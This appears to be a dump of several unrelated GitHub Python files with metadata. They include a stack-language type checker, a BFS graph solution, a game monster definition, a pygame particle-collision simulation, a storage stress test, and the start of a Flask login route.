check_stack(stack, [Ptr()])\r\n assert isinstance(struct.typ, Struct), \"can't upcast non-struct\"\r\n\r\n struct = struct.typ\r\n assert op.operand == struct,\\\r\n f\"can't upcast {type_to_str(struct)} to {type_to_str(op.operand)}\"\r\n\r\n check_stack(stack, op.operand.fields_types[len(struct.fields_types) :])\r\n\r\n stack.append(Ptr(op.operand))\r\n\r\n return Op(\r\n OpType.UPCAST,\r\n (\r\n sizeof(op.operand),\r\n len(op.operand.fields_types) - len(struct.fields_types),\r\n sizeof(struct),\r\n ),\r\n op.loc,\r\n )\r\n elif op.type == OpType.IF:\r\n check_stack(stack, [Int()])\r\n State.route_stack.append((\"if-end\", stack.copy()))\r\n elif op.type == OpType.ELSE:\r\n original_stack = State.route_stack.pop()[1]\r\n op.operand.stack_effect = (len(original_stack), len(stack))\r\n State.route_stack.append((\"if-else\", stack.copy()))\r\n stack.clear()\r\n stack.extend(original_stack)\r\n elif op.type == OpType.ENDIF:\r\n route_stack = State.route_stack.pop()\r\n if route_stack[0] == \"if-end\":\r\n op.operand.stack_effect = (len(stack), len(stack))\r\n check_route_stack(stack, route_stack[1])\r\n else:\r\n check_route_stack(stack, route_stack[1], \"in different routes of if-else\")\r\n elif op.type == OpType.WHILE:\r\n check_stack(stack, [Int()])\r\n State.route_stack.append((\"while\", stack.copy()))\r\n elif op.type == OpType.ENDWHILE:\r\n check_stack(stack, [Int()])\r\n pre_while_stack = State.route_stack.pop()[1]\r\n op.operand.stack_effect = (len(pre_while_stack), len(stack))\r\n check_route_stack(stack, pre_while_stack, \"in different routes of while\")\r\n elif op.type == OpType.FOR:\r\n iter_stack = type_check(op.operand[2])\r\n assert len(iter_stack) == 1, \"iterable expression should return one value\"\r\n if op.operand[1] == \"in\":\r\n return process_for_in(op, stack, iter_stack)\r\n elif op.operand[1] == \"until\":\r\n return process_for_until(op, stack, iter_stack)\r\n else:\r\n cont_assert(False, \"Unimplemented for type in type checking\")\r\n elif op.type == OpType.ENDFOR:\r\n State.bind_stack.pop()\r\n State.bind_stack.pop()\r\n if op.operand[1] == \"in\":\r\n if op.operand[2].len == 0:\r\n return []\r\n pre_for_stack = State.route_stack.pop()[1]\r\n check_route_stack(stack, pre_for_stack, \"in different routes of for\")\r\n end_while = Op(OpType.ENDWHILE, op.operand[0], loc=op.loc)\r\n State.ops_by_ips[op.operand[0].end] = end_while\r\n return [\r\n Op(OpType.PUSH_BIND_STACK, len(State.bind_stack), loc=op.loc),\r\n Op(OpType.PUSH_INT, 1, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.ADD, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(OpType.PUSH_INT, op.operand[2].len, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.LT, loc=op.loc),\r\n Op(OpType.UNBIND, 2, loc=op.loc),\r\n end_while,\r\n Op(OpType.OPERATOR, Operator.DROP, loc=op.loc),\r\n ]\r\n elif op.operand[1] == \"until\":\r\n pre_for_stack = State.route_stack.pop()[1]\r\n check_route_stack(stack, pre_for_stack, \"in different routes of for\")\r\n\r\n if State.config.re_NPD:\r\n State.locs_to_include.append(op.loc)\r\n end_while = Op(OpType.ENDWHILE, op.operand[0], loc=op.loc)\r\n State.ops_by_ips[op.operand[0].end] = end_while\r\n return [\r\n Op(OpType.PUSH_BIND_STACK, len(State.bind_stack), loc=op.loc),\r\n Op(OpType.PUSH_INT, 1, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.ADD, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(\r\n OpType.OPERATOR,\r\n Operator.LOAD8,\r\n loc=op.loc,\r\n loc_id=len(State.locs_to_include) - 1,\r\n ),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(OpType.PUSH_INT, 0, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.NE, loc=op.loc),\r\n Op(OpType.UNBIND, 2, loc=op.loc),\r\n end_while,\r\n ]\r\n elif op.type == OpType.BIND:\r\n assert len(stack) >= op.operand, \"stack is too short for bind\"\r\n State.bind_stack.extend(stack[-op.operand:])\r\n stack[-op.operand:] = []\r\n elif op.type == OpType.UNBIND:\r\n for _ in range(op.operand):\r\n State.bind_stack.pop()\r\n elif op.type == OpType.PUSH_BIND_STACK:\r\n typ = State.bind_stack[op.operand[0]]\r\n if op.operand[1] == \"base\":\r\n assert typ == Ptr(), \"Binded value self must be a pointer to use base\"\r\n assert isinstance(typ.typ, Struct), \"Binded value self must be a pointer to a structure to use base\"\r\n assert typ.typ.parent is not None, f'Structure \"{typ.typ.name}\" does not have a parent'\r\n\r\n stack.append(Ptr(typ.typ.parent))\r\n else:\r\n stack.append(State.bind_stack[op.operand[0]])\r\n return Op(OpType.PUSH_BIND_STACK, op.operand[0], loc=op.loc, loc_id=op.loc_id)\r\n elif op.type == OpType.DEFPROC:\r\n State.route_stack.append((\"proc\", stack.copy()))\r\n stack.clear()\r\n stack.extend(op.operand.in_stack)\r\n State.current_proc = op.operand\r\n elif op.type == OpType.ENDPROC:\r\n check_route_stack(\r\n stack,\r\n State.get_proc_by_block(op.operand).out_stack,\r\n \"in procedure definition\",\r\n )\r\n stack.clear()\r\n stack.extend(State.route_stack.pop()[1])\r\n State.current_proc = None\r\n elif op.type == OpType.CALL:\r\n process_call(op, stack)\r\n elif op.type == OpType.TYPED_LOAD:\r\n check_stack(stack, [Ptr(op.operand)])\r\n stack.append(op.operand)\r\n elif op.type == OpType.PACK:\r\n struct = State.structures[op.operand[0]]\r\n if not op.operand[1]:\r\n cont_assert(stack.pop().typ == struct, \"Probably a user now has more control over PACK (_, False)\")\r\n if \"__init__\" in struct.methods:\r\n args = struct.methods[\"__init__\"].in_stack.copy()[:-1]\r\n State.add_proc_use(struct.methods[\"__init__\"])\r\n else:\r\n args = struct.fields_types.copy()\r\n for i, j in enumerate(struct.defaults):\r\n del args[j - i]\r\n check_stack(stack, args)\r\n stack.append(Ptr(struct))\r\n elif op.type == OpType.PUSH_FIELD:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n ptr = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n assert isinstance(ptr.typ, Struct),\\\r\n f\"can't access field of non-struct : {type_to_str(ptr.typ)}\"\r\n assert op.operand in (*ptr.typ.fields, *ptr.typ.methods),\\\r\n f\"field {op.operand} not found on {type_to_str(ptr.typ)}\"\r\n if op.operand in ptr.typ.fields:\r\n offset = 0\r\n for i, j in ptr.typ.fields.items():\r\n if i == op.operand:\r\n break\r\n offset += sizeof(j)\r\n stack.append(ptr.typ.fields[op.operand])\r\n return Op(OpType.PUSH_FIELD, offset, op.loc)\r\n else:\r\n method = ptr.typ.methods[op.operand]\r\n State.add_proc_use(method)\r\n check_stack(stack, method.in_stack.copy()[:-1])\r\n stack.extend(method.out_stack)\r\n return Op(OpType.CALL, method, op.loc)\r\n elif op.type == OpType.PUSH_FIELD_PTR:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n ptr = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n assert isinstance(ptr.typ, Struct),\\\r\n f\"can't access field of non-struct : {type_to_str(ptr.typ)}\"\r\n assert op.operand in ptr.typ.fields,\\\r\n f\"field {op.operand} not found on {type_to_str(ptr.typ)}\"\r\n offset = 0\r\n for i, j in ptr.typ.fields.items():\r\n if i == op.operand:\r\n break\r\n offset += sizeof(j)\r\n stack.append(Ptr(ptr.typ.fields[op.operand]))\r\n return Op(OpType.PUSH_FIELD_PTR, offset, op.loc)\r\n elif op.type == OpType.CALL_ADDR:\r\n assert len(stack) >= 1, \"The stack is too short\"\r\n predicate = stack.pop()\r\n assert isinstance(predicate, Addr), f\"Predicate must be an addr, but it's {type_to_str(predicate)}\"\r\n check_stack(stack, predicate.in_types.copy())\r\n stack.extend(predicate.out_types)\r\n return Op(OpType.CALL_ADDR, predicate)\r\n elif op.type in (OpType.INDEX, OpType.INDEX_PTR):\r\n assert len(stack) >= 1, \"stack is too short\"\r\n arr = stack[-1]\r\n if isinstance(arr, Ptr):\r\n if isinstance(arr.typ, Struct):\r\n if f\"__{op.type.name.lower()}__\" in arr.typ.methods:\r\n proc = arr.typ.methods[f\"__{op.type.name.lower()}__\"]\r\n State.add_proc_use(proc)\r\n check_stack(stack, proc.in_stack.copy())\r\n stack.extend(proc.out_stack)\r\n return [Op(OpType.CALL, proc, op.loc)]\r\n stack.pop()\r\n check_stack(stack, [Int(), Ptr(Array())])\r\n stack.append(arr.typ.typ if op.type == OpType.INDEX else Ptr(arr.typ.typ))\r\n if State.config.re_IOR:\r\n State.locs_to_include.append(op.loc)\r\n return Op(\r\n op.type,\r\n (sizeof(arr.typ.typ), arr.typ.len),\r\n loc=op.loc,\r\n loc_id=len(State.locs_to_include) - 1,\r\n )\r\n elif op.type == OpType.SIZEOF:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n _type = stack.pop()\r\n stack.append(Int())\r\n for i in range(op.operand):\r\n assert hasattr(_type, \"typ\"), f\"{type_to_str(_type)} has no type\"\r\n assert _type.typ is not None, f\"{type_to_str(_type)} has no type\"\r\n _type = _type.typ\r\n\r\n return Op(OpType.PUSH_INT, sizeof(_type))\r\n elif op.type == OpType.PUSH_TYPE:\r\n if isinstance(op.operand, Int):\r\n stack.append(Ptr(State.structures[\"Type\"]))\r\n elif isinstance(op.operand, Ptr):\r\n stack.append(Ptr(State.structures[\"PtrType\"]))\r\n elif isinstance(op.operand, Addr):\r\n stack.append(Ptr(State.structures[\"AddrType\"]))\r\n elif isinstance(op.operand, Array):\r\n stack.append(Ptr(State.structures[\"ArrayType\"]))\r\n elif op.type == OpType.SYSCALL:\r\n check_stack(stack, [None] * (op.operand + 1))\r\n stack.append(None)\r\n elif op.type == OpType.OPERATOR:\r\n return type_check_operator(op, stack)\r\n elif op.type in (OpType.AUTO_INIT, OpType.ASM):\r\n pass # These operations are a generation thing\r\n else:\r\n cont_assert(False, f\"unknown op type in type_check_op: {op.type.name}\")\r\n\r\n return None\r\n\r\n\r\ndef type_check_operator(op: Op, stack: List[Type]) -> Optional[Union[Op, List[Op]]]:\r\n cont_assert(len(Operator) == 20, \"Unimplemented operator in type_check_operator\")\r\n\r\n if op.operand in (\r\n Operator.ADD, Operator.SUB, Operator.MUL, Operator.GT, Operator.LT, \r\n Operator.EQ, Operator.LE, Operator.GE, Operator.NE,\r\n ):\r\n assert len(stack) >= 2, \"stack is too short\"\r\n type2 = stack.pop()\r\n type1 = stack.pop()\r\n if type1 == Int() and type2 == Int():\r\n stack.append(Int())\r\n elif type1 == Ptr() and type2 == Ptr():\r\n if isinstance(type1.typ, Struct):\r\n assert type1.typ is not None and type2.typ is not None,\\\r\n f\"incompatible types for {op.operand.name.lower()}\"\r\n assert type1.typ == type2.typ or type2.typ == type1.typ,\\\r\n f\"can't perform operation on different types: {type_to_str(type1.typ)} and {type_to_str(type2.typ)}\"\r\n assert f\"__{op.operand.name.lower()}__\" in type1.typ.methods,\\\r\n f\"method __{op.operand.name.lower()}__ not found on {type_to_str(type1.typ)}\"\r\n method = type1.typ.methods[f\"__{op.operand.name.lower()}__\"]\r\n stack.extend(method.out_stack)\r\n State.add_proc_use(method)\r\n return [\r\n Op(OpType.OPERATOR, Operator.SWAP, loc=op.loc),\r\n Op(OpType.CALL, method, loc=op.loc),\r\n ]\r\n else:\r\n State.throw_error(f\"can't perform an operation on {type_to_str(type1)} and {type_to_str(type2)}\")\r\n else:\r\n State.throw_error(f\"incompatible types for {op.operand.name.lower()}\")\r\n elif op.operand == Operator.DIV:\r\n assert len(stack) >= 2, \"stack is too short\"\r\n type2 = stack.pop()\r\n type1 = stack.pop()\r\n if type1 == Int() and type2 == Int():\r\n stack.extend([Int(), Int()])\r\n elif type1 == Ptr() and type2 == Ptr():\r\n if isinstance(type1.typ, Struct):\r\n assert type1.typ == type2.typ,\\\r\n f\"can't perform operation on different types: {type_to_str(type1.typ)} and {type_to_str(type2.typ)}\"\r\n assert f\"__div__\" in type1.typ.methods,\\\r\n f\"method __div__ was not found on {type_to_str(type1.typ)}\"\t\r\n method = type1.typ.methods[f\"__div__\"]\r\n stack.extend(method.out_stack)\r\n State.add_proc_use(method)\r\n return [\r\n Op(OpType.OPERATOR, Operator.SWAP, loc=op.loc),\r\n Op(OpType.CALL, method, loc=op.loc),\r\n ]\r\n else:\r\n State.throw_error(f\"incompatible types for div\")\r\n elif op.operand == Operator.DUP:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n stack.append(stack[-1])\r\n elif op.operand == Operator.DROP:\r\n check_stack(stack, [None])\r\n elif op.operand == Operator.SWAP:\r\n assert len(stack) >= 2, \"stack is too short\"\r\n stack[-2], stack[-1] = stack[-1], stack[-2]\r\n elif op.operand == Operator.ROT:\r\n assert len(stack) >= 3, \"stack is too short\"\r\n stack[-3], stack[-2], stack[-1] = stack[-1], stack[-2], stack[-3]\r\n elif op.operand == Operator.OVER:\r\n assert len(stack) >= 2, \"stack is too short\"\r\n stack.append(stack[-2])\r\n elif op.operand in (Operator.STORE, Operator.STRONG_STORE):\r\n assert len(stack) >= 1, \"stack is too short\"\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n ptr = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n if ptr.typ is None:\r\n check_stack(stack, [Int()], arg=1)\r\n elif isinstance(ptr.typ, Struct) and op.operand == Operator.STORE:\r\n check_stack(stack, [Ptr(ptr.typ)], arg=1)\r\n return Op(OpType.MOVE_STRUCT, sizeof(ptr.typ), State.loc)\r\n else:\r\n check_stack(stack, [ptr.typ], arg=1)\r\n if op.operand == Operator.STRONG_STORE:\r\n return Op(OpType.OPERATOR, Operator.STORE, op.loc)\r\n elif op.operand == Operator.STORE8:\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n check_stack(stack, [Int(), Ptr()])\r\n elif op.operand == Operator.LOAD:\r\n ptr = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n if ptr.typ is None:\r\n stack.append(Int())\r\n elif ptr.typ == Array():\r\n State.throw_error(\"can't unpack array to stack\")\r\n elif isinstance(ptr.typ, Struct):\r\n assert ptr.typ.is_unpackable, f\"can't unpack {type_to_str(ptr.typ)}\"\r\n stack.extend(ptr.typ.fields_types)\r\n return Op(OpType.UNPACK, sizeof(ptr.typ))\r\n else:\r\n stack.append(ptr.typ)\r\n elif op.operand == Operator.LOAD8:\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n check_stack(stack, [Ptr()])\r\n stack.append(Int())\r\n else:\r\n cont_assert(False, f\"Unimplemented operator in type_check_operator {op.operand.name}\")\r\n\r\n return None\r\n","repo_name":"farkon00/cont","sub_path":"type_checking/type_checking.py","file_name":"type_checking.py","file_ext":"py","file_size_in_byte":26147,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"18"} +{"seq_id":"1074585409","text":"# 완전탐색\n# 전력망을 둘로 나누기\n# 시간복잡도: O(N^2 + NE)\n# defaultdict에 대한 간단한 설명은 etc 폴더에 넣었습니다.\n\"\"\"\nsolution 함수 => O(N)입니다.\nvisited 리스트 초기화 => O(N)\n\ndefaultdict를 생성하는 데 걸리는 시간은 원소의 수에 비례합니다. 이 경우 원소의 수는 각 노드마다 연결된 간선의 개수를 나타내므로, wires 리스트에 있는 간선의 수에 비례합니다. 즉, defaultdict를 생성하는 데 필요한 시간 복잡도는 O(E)입니다.\n\nbfs 함수는 노드의 수 N에 비례하는 루프를 수행하며, 루프 내에서는 각 노드에 대해 연결된 노드를 모두 확인합니다. 이 때문에 bfs 함수의 시간 복잡도는 O(N + E)입니다.\n\ncnt_li 리스트에 대한 루프는 노드의 수 N에 비례합니다. 각 노드에 대해 bfs 함수를 호출하므로, 이 루프의 시간 복잡도는 O(N^2 + NE)입니다.\n\nres 값을 업데이트 => O(1)입니다.\n\n따라서 solution 함수의 전체 시간 복잡도는 O(N^2 + NE)입니다.\n\n위 코드는 간선의 수가 적을 때는 효율적이지만, 간선의 수가 많을 경우에는 연산 비용이 많이 증가하므로, 큰 그래프에서는 느릴 수 있습니다.\n\"\"\"\n# wires는 길이가 n-1인 정수형 2차원 배열\nfrom collections import deque, defaultdict\n\ndef bfs(graph, start, visited):\n cnt = 1 # 시작한 노드는 연결된 노드가 1개로 시작됨\n d = deque([start])\n visited[start] = 1 \n while d:\n b = d.popleft()\n for i in graph[b]:\n if not visited[i]:\n d.append(i)\n visited[i] = 1\n cnt += 1\n return cnt\n\ndef solution(n, wires):\n wire = deque(wires) # 전선을 하나씩 끊어 탐색해야하므로 deque 사용\n res = n # n 변경하지 않기 위해\n for _ in range(len(wires)):\n a = wire.popleft()\n visited = [0] * (n+1)\n graph = defaultdict(list)\n cnt_li = [] # 전선을 끊어서 나온 전력망 두개의 각각 송전탑 개수 저장 리스트\n for v1, v2 in wire:\n graph[v1].append(v2)\n graph[v2].append(v1)\n for i in range(1, n+1):\n if not visited[i]:\n cnt_li.append(bfs(graph, i, visited))\n res = min(abs(cnt_li[0] - cnt_li[1]), res)\n wire.append(a) # 다른 전선 끊기 위해 끊었던 전선 다시 붙여줌\n return res","repo_name":"JiSuMun/Algorithm-Study","sub_path":"W06/JiSuMun/86971.py","file_name":"86971.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73198661161","text":"Bandit = genMonster(\"Bandit\", (129, 6080), \"a Bandit\")\nBandit.setOutfit(58, 59, 45, 114)\nBandit.setTargetChance(10)\nBandit.bloodType(\"blood\")\nBandit.setHealth(245)\nBandit.setExperience(65)\nBandit.setSpeed(180) # Correct\nBandit.walkAround(1,1,1) # energy, fire, poison\nBandit.setBehavior(summonable=450, hostile=1, illusionable=1, convinceable=450, pushable=1, pushItems=1, pushCreatures=0, targetDistance=1, runOnHealth=25)\nBandit.voices(\"Hand me your purse!\", \"Your money or your life!\")\nBandit.setImmunity(0,0,0) # paralyze, invisible, lifedrain\nBandit.setDefense(11, fire=1.0, earth=1.0, energy=1.0, ice=1.0, holy=1.0, death=1.05, physical=1.1, drown=1.0)\nBandit.regMelee(43)\nBandit.loot( (2148, 100, 27), (\"axe\", 31.75), (\"brass shield\", 18.0), (\"mace\", 10.75), (\"chain helmet\", 5.5), (\"leather legs\", 14.0), (\"brass armor\", 2.25), (\"tomato\", 10.5, 2), (\"iron helmet\", 0.5) )","repo_name":"novasdream/PyOT","sub_path":"data/monsters/Humans/Outlaws/Bandit.py","file_name":"Bandit.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22382659062","text":"'''\r\nWrite a Python function to check whether a string is a pangram or not. Note: Pangrams\r\nare words or sentences containing every letter of the alphabet at least once. For\r\nexample: \"The quick brown fox jumps over the lazy dog\"\r\n'''\r\ndef pangram(str):\r\n a = ['a','b','c','d','e','f','g','h','i','j','k','l','m','o','n','p','q','r','s','t',' ','u','v','w','x','y','z']\r\n\r\n for i in a:\r\n if i not in a:\r\n return False\r\n return True\r\n\r\nprint(pangram(\"the quick brown fox jumps over the lazy dog\"))\r\nprint(pangram(\"Pack my box with five dozen liquor jugs\"))\r\nprint(pangram(\"hello\"))\r\n \r\n \r\n","repo_name":"krrishnagulati/assignment-6-ITC","sub_path":"ques4.py","file_name":"ques4.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14374036871","text":"import sys\r\nfrom math import ceil\r\nfrom random import randrange\r\nfrom numpy import array, dot, linalg\r\nimport time\r\nimport os\r\n\r\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\" # Hides information about pygame\r\nimport pygame as PG\r\n\r\n# Colors\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nGREY = (200, 200, 200)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\n\r\n\r\ndef run_simulation(ThreadID, WIDTH, HEIGHT, ParticleRadius, ParticleCount, PLAYBACK_SPEED, SIMTIME, FPS, windowed):\r\n # initialize Pygame\r\n PG.init()\r\n SIMTIMECONST = SIMTIME\r\n if windowed:\r\n # create window\r\n screen = PG.display.set_mode((WIDTH, HEIGHT), flags=PG.RESIZABLE)\r\n PG.display.set_caption(\"Collisions- \" + str(ParticleCount))\r\n PG.display.set_icon(PG.image.load(\"graphics/icon.png\"))\r\n # Assets\r\n CellImage = PG.image.load(\"graphics/blue_particle.png\").convert()\r\n RingImage = PG.image.load(\"graphics/red_particle.png\").convert()\r\n # create sprite groups\r\n all_sprites = PG.sprite.Group()\r\n all_particles = []\r\n\r\n # Classes\r\n class Particle(PG.sprite.Sprite):\r\n def __init__(self, x, y, radius, v):\r\n PG.sprite.Sprite.__init__(self)\r\n self.radius = radius\r\n self.image = PG.Surface((radius * 2, radius * 2))\r\n if windowed:\r\n self.image = PG.transform.scale(CellImage, (radius * 2, radius * 2))\r\n self.image.convert_alpha()\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = x\r\n self.rect.centery = y\r\n self.v = v\r\n self.move = array([0, 0])\r\n self.mass = 1\r\n\r\n def update(self):\r\n self.rect.centerx += int(self.v[0]) * PLAYBACK_SPEED\r\n self.rect.centery += int(self.v[1]) * PLAYBACK_SPEED\r\n if self.rect.right > WIDTH:\r\n self.rect.right = WIDTH\r\n self.v[0] = -self.v[0]\r\n self.collision(0)\r\n if self.rect.left < 0:\r\n self.rect.left = 0\r\n self.v[0] = -self.v[0]\r\n self.collision(0)\r\n if self.rect.bottom > HEIGHT:\r\n self.rect.bottom = HEIGHT\r\n self.v[1] = -self.v[1]\r\n self.collision(0)\r\n if self.rect.top < 0:\r\n self.rect.top = 0\r\n self.v[1] = -self.v[1]\r\n self.collision(0)\r\n\r\n def collision(self, _):\r\n pass\r\n\r\n class RedParticle(Particle):\r\n def __init__(self, x, y, radius, v):\r\n Particle.__init__(self, x, y, radius, v)\r\n if windowed:\r\n self.image = PG.transform.scale(RingImage, (radius * 2, radius * 2))\r\n self.rect = self.image.get_rect()\r\n self.timer = time.time()\r\n self.collisions = self.distance = 0\r\n self.last_position = array([x, y])\r\n\r\n def collision(self, count):\r\n self.collisions += count\r\n position = array([self.rect.centerx, self.rect.centery])\r\n self.distance += linalg.norm(position - self.last_position)\r\n self.last_position = position\r\n\r\n # Functions\r\n def events():\r\n for event in PG.event.get():\r\n if event.type == PG.QUIT:\r\n sys.exit(0)\r\n\r\n def check_collisions():\r\n for s in range(len(all_particles)):\r\n for t in range(s + 1, len(all_particles)):\r\n source = all_particles[s]\r\n target = all_particles[t]\r\n min_distance = (source.radius + target.radius) ** 2\r\n distance = (source.rect.centerx - target.rect.centerx) ** 2 + (\r\n source.rect.centery - target.rect.centery) ** 2\r\n if distance <= min_distance: # if collision\r\n # source.move = target.move = array([0, 0])\r\n overlapping(source, target, distance ** 0.5)\r\n collision(source, target)\r\n target.collision(1)\r\n source.collision(1)\r\n\r\n def overlapping(source, target, distance):\r\n overlap = (source.radius + target.radius - distance) / 2.0\r\n n = array([target.rect.centerx - source.rect.centerx, target.rect.centery - source.rect.centery]) / distance\r\n source.rect.centerx -= ceil(overlap * n[0])\r\n target.rect.centerx += ceil(overlap * n[0])\r\n source.rect.centery -= ceil(overlap * n[1])\r\n target.rect.centery += ceil(overlap * n[1])\r\n\r\n def collision(source, target):\r\n normal = array([target.rect.centerx - source.rect.centerx, target.rect.centery - source.rect.centery])\r\n tangent = array([-normal[1], normal[0]])\r\n distance = linalg.norm(normal)\r\n n = normal / distance\r\n t = tangent / distance\r\n dst = dot(source.v, t)\r\n dtt = dot(target.v, t)\r\n dsn = dot(source.v, n)\r\n dtn = dot(target.v, n)\r\n if source.mass != target.mass:\r\n source.v = dst * t + (((source.mass - target.mass) * dsn + 2 * target.mass * dtn) /\r\n (source.mass + target.mass)) * n\r\n target.v = dtt * t + (((target.mass - source.mass) * dtn + 2 * source.mass * dsn) /\r\n (source.mass + target.mass)) * n\r\n else:\r\n source.v = dst * t + dtn * n\r\n target.v = dtt * t + dsn * n\r\n\r\n # Add red Particle\r\n red_par_init_speed = randrange(5, 10)\r\n m = RedParticle(0, 0, ParticleRadius,\r\n array([red_par_init_speed, red_par_init_speed]))\r\n all_sprites.add(m)\r\n all_particles.append(m)\r\n # Add random Particles\r\n for i in range(ParticleCount):\r\n m = Particle(randrange(WIDTH), randrange(HEIGHT), ParticleRadius,\r\n array([randrange(-10, 10), randrange(-10, 10)]))\r\n all_sprites.add(m)\r\n all_particles.append(m)\r\n\r\n # Game loop\r\n clock = PG.time.Clock()\r\n while SIMTIME > 0:\r\n SIMTIME -= 1\r\n events() # Process input (events)\r\n check_collisions() # physics\r\n all_sprites.update() # physics\r\n if windowed:\r\n screen.fill(GREY)\r\n all_sprites.draw(screen)\r\n PG.display.flip()\r\n clock.tick(FPS)\r\n PG.quit()\r\n # save Data\r\n file = open(f\"results/result{ParticleCount},{SIMTIMECONST}.txt\", \"a\")\r\n file.write(f\"{all_particles[0].collisions};{int(all_particles[0].distance)}\\n\")\r\n file.close()\r\n\r\n print(f\"Thread {ThreadID} done\")\r\n","repo_name":"KanarXD/Particle_Colisions","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12959446488","text":"\"\"\"\nCode to stress the low-level API as much as possible to expose\nany memory leaks or error handling issues.\n\"\"\"\nimport argparse\nimport os\nimport random\nimport resource\nimport sys\nimport time\nimport unittest\n\nimport tests.test_errors as test_errors\nimport tests.test_file_format as test_file_format\nimport tests.test_lowlevel as test_lowlevel\nimport tests.test_storage as test_storage\n\n\ndef main():\n modules = {\n \"errors\": test_errors,\n \"file_format\": test_file_format,\n \"file_storage\": test_storage,\n \"lowlevel\": test_lowlevel,\n }\n parser = argparse.ArgumentParser(\n description=\"Run tests in a loop to stress low-level interface\"\n )\n parser.add_argument(\n \"-m\",\n \"--module\",\n help=\"Run tests only on this module\",\n choices=list(modules.keys()),\n )\n args = parser.parse_args()\n test_modules = list(modules.values())\n if args.module is not None:\n test_modules = [modules[args.module]]\n\n print(\"iter\\ttests\\terr\\tfail\\tskip\\tRSS\\tmin\\tmax\\tmax@iter\")\n max_rss = 0\n max_rss_iter = 0\n min_rss = 1e100\n iteration = 0\n last_print = time.time()\n devnull = open(os.devnull, \"w\")\n while True:\n # We don't want any random variation in the amount of memory\n # used from test-to-test.\n random.seed(1)\n testloader = unittest.TestLoader()\n suite = testloader.loadTestsFromModule(test_modules[0])\n for mod in test_modules[1:]:\n suite.addTests(testloader.loadTestsFromModule(mod))\n runner = unittest.TextTestRunner(verbosity=0, stream=devnull)\n result = runner.run(suite)\n\n rusage = resource.getrusage(resource.RUSAGE_SELF)\n if max_rss < rusage.ru_maxrss:\n max_rss = rusage.ru_maxrss\n max_rss_iter = iteration\n if min_rss > rusage.ru_maxrss:\n min_rss = rusage.ru_maxrss\n\n # We don't want to flood stdout, so we rate-limit to 1 per second.\n if time.time() - last_print > 1:\n print(\n iteration,\n result.testsRun,\n len(result.failures),\n len(result.errors),\n len(result.skipped),\n rusage.ru_maxrss,\n min_rss,\n max_rss,\n max_rss_iter,\n sep=\"\\t\",\n end=\"\\r\",\n )\n last_print = time.time()\n sys.stdout.flush()\n\n iteration += 1\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tskit-dev/kastore","sub_path":"python/stress_lowlevel.py","file_name":"stress_lowlevel.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29805681783","text":"\"\"\"General purpose utilities to read files and write to files.\"\"\"\n\nfrom .encrypter import Encrypter\n\nfrom .file_io import (\n PathFilterFunction,\n InvalidFileError,\n is_dir,\n is_file,\n join,\n exists,\n get_file_base_name,\n create_file,\n remove_file,\n list_dir,\n create_directory,\n ensure_directory,\n write_to_binary_file,\n read_binary_file,\n)\n\nfrom .terminal_io import TerminalInterface, Format\n\n__all__ = [\n 'Encrypter',\n 'PathFilterFunction',\n 'is_dir',\n 'is_file',\n 'join',\n 'get_file_base_name',\n 'InvalidFileError',\n 'exists',\n 'create_file',\n 'remove_file',\n 'list_dir',\n 'create_directory',\n 'ensure_directory',\n 'write_to_binary_file',\n 'read_binary_file',\n 'TerminalInterface',\n 'Format',\n]\n","repo_name":"aureliencarle/cryptext","sub_path":"src/cryptext/io/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38153394763","text":"#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n\r\nfrom flask import Blueprint,session\r\nfrom flask import jsonify,request\r\nfrom flask_web import db\r\nfrom flask_web.databaseModel import Course,Teacher,USER,MENU,STUDENT,Course_Student,SignData,Course_Sign\r\nimport json\r\nimport time\r\nimport datetime\r\nimport sys\r\n \r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\nmod = Blueprint('app_student_op', __name__)\r\n\r\n@mod.route('/app/student/login_check', methods=['post'])\r\ndef login_check_student():\r\n username_password=request.get_data()\r\n username_password=json.loads(username_password)\r\n # print(username_password)\r\n # {u'password': u'123', u'id': 